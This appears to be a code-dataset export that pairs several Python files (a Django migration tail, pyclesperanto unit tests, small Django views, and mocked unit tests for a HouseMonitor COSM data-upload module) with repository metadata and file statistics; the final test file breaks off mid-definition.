field=models.ForeignKey(help_text='The task type for which this is an instance.', on_delete=django.db.models.deletion.CASCADE, to='tasksapi.ExecutableTaskType'),
),
migrations.AlterField(
model_name='executabletaskinstance',
name='user',
field=models.ForeignKey(help_text='The author of this instance.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='executabletasktype',
name='user',
field=models.ForeignKey(help_text='The author of this task.', null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='taskqueue',
name='user',
field=models.ForeignKey(help_text='The creator of the queue.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 45.655738 | 173 | 0.656373 | 316 | 2,785 | 5.639241 | 0.189873 | 0.049383 | 0.078563 | 0.123457 | 0.835017 | 0.823232 | 0.766554 | 0.70202 | 0.657688 | 0.657688 | 0 | 0.008862 | 0.230162 | 2,785 | 60 | 174 | 46.416667 | 0.822295 | 0.016158 | 0 | 0.722222 | 1 | 0 | 0.226808 | 0.066472 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68da0b35bc5ef5c3afca108eec5a6c421569db5d | 1,154 | py | Python | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_mean_of_all_pixels.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_mean_of_all_pixels_3d():
test1 = cle.push(np.asarray([
[
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 5, 2, 0, 0]
]
]))
s = cle.mean_of_all_pixels(test1)
assert s == 1
def test_mean_of_all_pixels_2d():
test1 = cle.push(np.asarray([
[0, 4, 0, 0, 2],
[0, 0, 0, 8, 0],
[3, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[0, 5, 2, 0, 0]
]))
s = cle.mean_of_all_pixels(test1)
assert s == 1
def test_mean_of_all_pixels_1d():
test1 = cle.push(np.asarray(
[0, 8, 0, 0, 2]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
def test_mean_of_all_pixels_1d_y():
test1 = cle.push(np.asarray(
[[0], [8], [0], [0], [2]]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
def test_mean_of_all_pixels_1d_z():
test1 = cle.push(np.asarray(
[[[0]], [[8]], [[0]], [[0]], [[2]]]
))
s = cle.mean_of_all_pixels(test1)
assert s == 2
| 19.233333 | 47 | 0.470537 | 186 | 1,154 | 2.688172 | 0.16129 | 0.1 | 0.084 | 0.3 | 0.892 | 0.892 | 0.848 | 0.844 | 0.844 | 0.844 | 0 | 0.114094 | 0.354419 | 1,154 | 59 | 48 | 19.559322 | 0.557047 | 0 | 0 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 1 | 0.119048 | false | 0 | 0.047619 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6b5a600b39a840b2e06dca7ac5f8de6e2efa9b0e | 116 | py | Python | Models/__init__.py | Kthyeon/micronet_neurips_challenge | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | 19 | 2019-11-27T07:18:35.000Z | 2021-08-20T14:16:17.000Z | Models/__init__.py | 3outeille/KAIST-AI-NeurIPS2019-MicroNet-2nd-place-solution | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | null | null | null | Models/__init__.py | 3outeille/KAIST-AI-NeurIPS2019-MicroNet-2nd-place-solution | 9f71fb752e8fbd5abca07be530f7fb19e164125c | [
"MIT"
] | 6 | 2019-12-18T02:09:54.000Z | 2021-06-21T11:34:36.000Z | from .MicroNet import *
from .MicroNet_Prune import *
from .imagenet_micro import *
from .MicroNet_imagenet import * | 29 | 32 | 0.801724 | 15 | 116 | 6 | 0.4 | 0.4 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12931 | 116 | 4 | 32 | 29 | 0.891089 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
6b86e27e228580a34c9fa512ac5950dd23d57ef2 | 236 | py | Python | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | nadlogar/accounts/views.py | drobilc/nadlogar | be03cd1c8d016259d7ce478dd858a3aef55bb49a | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
from django.conf import settings
def registracija(request):
return redirect(settings.FRANCEK_REGISTRACIJA)
def pozabljeno_geslo(request):
return redirect(settings.FRANCEK_POZABLJENO_GESLO) | 29.5 | 54 | 0.834746 | 28 | 236 | 6.892857 | 0.5 | 0.103627 | 0.217617 | 0.300518 | 0.373057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105932 | 236 | 8 | 54 | 29.5 | 0.914692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
6ba632c4d03850e5d0e7c81994988158ff1b9665 | 44,124 | py | Python | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | 1 | 2021-06-28T06:52:03.000Z | 2021-06-28T06:52:03.000Z | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | null | null | null | housemonitor/outputs/cosm/test/send_test.py | gary-pickens/HouseMonitor | 4b169bdbeed9013e1824d4bb929970ae0c27a6c9 | [
"MIT"
] | null | null | null | '''
Created on Dec 10, 2012
@author: Gary
'''
from housemonitor.configuration.cosmconfiguration import CosmConfiguration
from httplib2 import HttpLib2Error
from housemonitor.lib.common import Common
from housemonitor.lib.getdatetime import GetDateTime
from housemonitor.lib.constants import Constants
from housemonitor.lib.hmqueue import HMQueue
from mock import Mock, MagicMock, patch
from housemonitor.outputs.cosm.control import COSMControl
from housemonitor.outputs.cosm.outputStep import COSMOutputStep
from housemonitor.outputs.cosm.outputthread import COSMOutputThread
from housemonitor.outputs.cosm.send import COSMSend
import datetime
import httplib2
import json
import logging.config
import pprint
import unittest
class Test( unittest.TestCase ):
logger = logging.getLogger( 'UnitTest' )
def setUp( self ):
logging.config.fileConfig( "unittest_logging.conf" )
def tearDown( self ):
pass
config_data = \
{'device 1': {'port 1': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
},
'device 2': {'port 1': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '2',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
config_data_1 = \
{'device': {'port': {
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: 'disposition',
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 'lat',
Constants.Cosm.location.longitude: 'lon',
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: 'auto_feed_url',
Constants.Cosm.creator: 'creator',
Constants.Cosm.created: 'created',
Constants.Cosm.email: 'email',
Constants.Cosm.feed: 'feed',
Constants.Cosm.id: 'id',
Constants.Cosm.private: 'private',
Constants.Cosm.status: 'status',
Constants.Cosm.tags: 'tags',
Constants.Cosm.title: 'title',
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: 'version',
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}}}
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
current_value = 10
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: current_value}
cs.createDataStream( device, port, data )
item = cs.datastreams.pop()
self.assertEqual( item[Constants.Cosm.datastream.min_value], 0 )
self.assertEqual( item[Constants.Cosm.datastream.max_value], 100 )
self.assertEqual( item[Constants.Cosm.datastream.tags], 'tags' )
self.assertEqual( item[Constants.DataPacket.current_value], current_value )
self.assertEqual( item['id'], '1' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_two_datapoints( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
current_value = 10
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: current_value}
cs.createDataStream( device, port, data )
# self.assertListEqual( cs.datapoints['1'], [{'at':'2012-01-02T03:04:05', 'value': 10}] )
cs.createDataStream( device, port, data )
# self.assertListEqual( cs.datapoints['1'], [{'at':'2012-01-02T03:04:05', 'value': 10}, {'at':'2012-01-02T03:04:05', 'value': 10}] )
data = {'device': device,
'port': port,
Constants.DataPacket.units: 'X',
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.action: Constants.DataPacket.send,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 6 ),
Constants.DataPacket.current_value: 11}
cs.createDataStream( device, port, data )
self.assertListEqual( cs.datapoints['1'], [] )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_device( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 3'
port = 'port 1'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/11',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file: device 3' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_port( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 2'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/12',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file: port 2' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_no_arrival_time( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
data = {'device': device,
'port': port,
# Constants.DataPacket.arrival_time: '12:12:12 12/12/13',
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'at is not in data' ):
cs.createDataStream( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createDataStream_with_bad_no_current_value( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
device = 'device 1'
port = 'port 1'
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/14',
# Constants.DataPacket.current_value: 10
}
with self.assertRaisesRegexp( KeyError, 'current_value is not in data' ):
cs.createDataStream( device, port, data )
####################################################################################
# Test Location
####################################################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: '12:12:12 12/12/15',
Constants.DataPacket.current_value: 10}
location = cs.createLocation( device, port )
self.assertEqual( location[Constants.Cosm.location.exposure], Constants.Cosm.location.exposure )
self.assertEqual( location[Constants.Cosm.location.domain], Constants.Cosm.location.domain )
self.assertEqual( location[Constants.Cosm.location.disposition], Constants.Cosm.location.disposition )
self.assertEqual( location[Constants.Cosm.location.latitude], Constants.Cosm.location.latitude )
self.assertEqual( location[Constants.Cosm.location.longitude], Constants.Cosm.location.longitude )
self.assertEqual( location[Constants.Cosm.location.private], Constants.Cosm.location.private )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation_with_bad_device( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file: device 3' ):
cs.createLocation( 'device 3', 'port 1' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createLocation_with_bad_port( self, config ):
options = None
cs = COSMSend( options )
config.assert_called_once_with()
cs.config = self.config_data
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file: port 2' ):
cs.createLocation( 'device 1', 'port 2' )
##########################################################
# test empty_datastreas
##########################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_empty_datastream_list( self, config ):
options = None
cs = COSMSend( options )
cs.empty_datastream_list()
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
self.assertEqual( len( cs.datastreams ), 0 )
cs.createDataStream( device, port, data )
cs.createDataStream( device, port, data )
cs.empty_datastream_list()
##########################################################
# test feed
##########################################################
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
feed = cs.createFeed( data, device, port )
pprint.pprint( feed )
self.assertEqual( feed[Constants.Cosm.title], Constants.Cosm.title )
self.assertEqual( feed[Constants.Cosm.status], Constants.Cosm.status )
self.assertEqual( feed[Constants.Cosm.creator], Constants.Cosm.creator )
self.assertEqual( feed[Constants.Cosm.created], Constants.Cosm.created )
self.assertEqual( feed[Constants.Cosm.feed], 'url' )
self.assertEqual( feed[Constants.Cosm.email], Constants.Cosm.email )
self.assertEqual( feed[Constants.Cosm.id], Constants.Cosm.id )
self.assertEqual( feed[Constants.Cosm.auto_feed_url], ( 'url', ) )
self.assertEqual( feed[Constants.Cosm.version], Constants.Cosm.version )
cs.empty_datastream_list()
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_no_device_in_config_file( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data_1
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Device is not in cosm configuration file:.*' ):
feed = cs.createFeed( data, device, port )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_no_port_in_config_file( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port'
config.assert_called_once_with()
cs.config = self.config_data
data = {
Constants.DataPacket.device: device,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
with self.assertRaisesRegexp( KeyError, 'Port is not in cosm configuration file:.*' ):
feed = cs.createFeed( data, device, port )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createFeed_with_two_datestreams( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = self.config_data
data = {'device': device,
'port': port,
Constants.DataPacket.action: Constants.DataPacket.accumulate,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
data[Constants.DataPacket.current_value] = 545454
cs.createDataStream( device, port, data )
data['device'] = device = 'device 2'
data[Constants.DataPacket.current_value] = 999
cs.createDataStream( device, port, data )
data['device'] = device = 'device 1'
data[Constants.DataPacket.action] = Constants.DataPacket.send
cs.report_data = MagicMock()
cs.output( data )
pprint.pprint( cs.json )
pprint.pprint( cs.datapoints )
# self.assertEqual( cs.[Constants.Cosm.title], Constants.Cosm.title )
# self.assertEqual( cs.json[Constants.Cosm.status], Constants.Cosm.status )
# self.assertEqual( cs.json[Constants.Cosm.creator], Constants.Cosm.creator )
# self.assertEqual( cs.json[Constants.Cosm.created], Constants.Cosm.created )
# self.assertEqual( cs.json[Constants.Cosm.feed], 'url' )
# self.assertEqual( cs.json[Constants.Cosm.email], Constants.Cosm.email )
# self.assertEqual( cs.json[Constants.Cosm.id], Constants.Cosm.id )
# self.assertEqual( cs.json[Constants.Cosm.auto_feed_url], ( 'url', ) )
# self.assertEqual( cs.json[Constants.Cosm.version], Constants.Cosm.version )
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_createJSONReport( self, config ):
options = None
cs = COSMSend( options )
device = 'device 1'
port = 'port 1'
config.assert_called_once_with()
cs.config = config_data = \
{'device 1': \
{'port 1': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
data = {'device': device,
'port': port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs.createDataStream( device, port, data )
data[Constants.DataPacket.current_value] = 545454
cs.createDataStream( device, port, data )
json = cs.createJSONReport( device, port, data )
pprint.pprint( json )
cs.empty_datastream_list()
cs = None
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attrs = {'request.return_value': ( response, 3 )}
http = Mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.httplib2.Http' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_passing_in_http( self, config, http ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
http = Mock()
response = Mock()
attrs = {'request.return_value': ( response, 3 )}
http.configure_mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_300_status( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=300 )
attrs = {'request.return_value': ( response, 3 )}
http = Mock( **attrs )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_in_test_mode( self, config ):
device = 'device'
port = 'port'
options = MagicMock()
options.in_test_mode = MagicMock()
http = Mock()
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
